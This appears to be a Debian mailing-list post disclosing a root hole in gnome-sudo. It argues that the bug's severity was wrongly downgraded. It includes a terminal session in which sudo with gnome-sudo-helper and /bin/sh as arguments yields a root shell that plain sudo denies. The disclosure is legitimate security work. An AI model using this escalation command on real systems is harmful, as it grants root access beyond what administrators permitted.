[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

If you care about debian's security read this



Hello,

gnome-sudo and configlet's maintainers are trying to let a root hole
go in woody

I've reported a grave bug on gnome-sudo because it will let you run
anything as root when you configure it to be useful, even if you don't
have ways of doing that with normal sudo... see this:

[/etc]
[root]@[couve] # cat sudoers
# User privilege specification

root    ALL=(ALL) ALL
kov     ALL = (root) NOPASSWD: /usr/sbin/chroot, /usr/sbin/pbuilder, /usr/lib/gnome-sudo/gnome-sudo-helper, PASSWD: /usr/bin/apt-get
[/etc]
[root]@[couve] # exit
[/etc]
[kov]@[couve] $ sudo /usr/lib/gnome-sudo/gnome-sudo-helper /tmp/a \ /bin/sh
GNOME_SUDO_DONE sh-2.05a# whoami
root
sh-2.05a# exit
[/etc]
[kov]@[couve] $ sudo /bin/sh
Password:
Sorry, user kov is not allowed to execute '/bin/sh' as root on couve.horta.
[/etc]
[kov]@[couve] $ gnome-sudo ls /
bin   cdrom  floppy  lib         opt   sbin     usr      vmlinuz.old
boot  dev    hda6    lost+found  proc  scratch  var
cdr   etc    home    mnt         root  tmp      vmlinuz

now I remove gnome-sudo-helper from my /etc/sudoers:

[/etc]
[kov]@[couve] $ sudo /usr/lib/gnome-sudo/gnome-sudo-helper /tmp/a /bin/sh
Sorry, user kov is not allowed to execute '/usr/lib/gnome-sudo/gnome-sudo-helper /tmp/a /bin/sh' as root on couve.horta.
[/etc]
[kov]@[couve] $ gnome-sudo ls /
[/etc]
[kov]@[couve] $

no more root hole, but gnome-sudo doesn't work anymore...
(and not even gives an error message... that's why bug
#133402 is related to this problem)

(the lines may be wrapped by my mail client)

the only way to use gnome-sudo is adding /usr/lib/gnome-sudo/gnome-sudo-helper to /etc/sudoers... and the
problem here is bigger, because the program/instalation does not
warn the user that he has a root hole after being able to use gnome-sudo

details in bug #134521, which was grave but has just being reseverited
'wishlist' by configlets' maintainer.. sorry for bringing this to -devel
but the package's maintainer just doesn't care about this...

[]s!

-- 
kov@debian.org: Gustavo Noronha <http://www.metainfo.org/kov>
Debian: <http://www.debian.org> * <http://debian-br.cipsga.org.br>



Reply to: